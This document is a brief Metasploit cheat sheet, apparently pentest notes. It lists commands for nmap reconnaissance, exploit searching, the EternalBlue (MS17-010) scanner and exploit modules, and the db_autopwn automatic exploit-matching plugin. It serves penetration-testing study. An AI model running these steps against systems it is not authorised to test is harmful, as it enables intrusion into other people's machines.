Vulnerability Scanning

# Basic Setup
setg [HOST]
workspace -a [suitable-name]

# nmap for basic recon
db_nmap -sS -sV -O [HOST]
hosts
services

Searching for Exploits

# Manual Exploit Search
search type:exploit name:[name]
# Searches for relevant exploits based on the detected services. This process can be time-consuming.

# Searchsploit
searchsploit [name]
# Uses the searchsploit tool to find local exploit suggestions based on the service names.

Eternal Blue Exploit

# Scan for vulnerability
use scanner/smb/smb_ms17_010

# Attempt to exploit
use windows/smb/ms17_010_eternalblue

Automatic Exploit Matching

# Move the autopwn plugin
sudo mv db_autopwn.rb /usr/share/metasploit-framework/plugins

# Load the plugin
load db_autopwn

# Run the autopwn tool
db_autopwn -p -t -PI [PORT]
# This automatically scans the database and matches found services to possible exploit modules.

Analyzing Vulnerabilities

# Auto Analysis
analyze
# Automatically analyzes open ports to determine possible exploits.

# List Vulnerabilities
vulns
# Displays a list of any vulnerabilities identified during the scan.

Last updated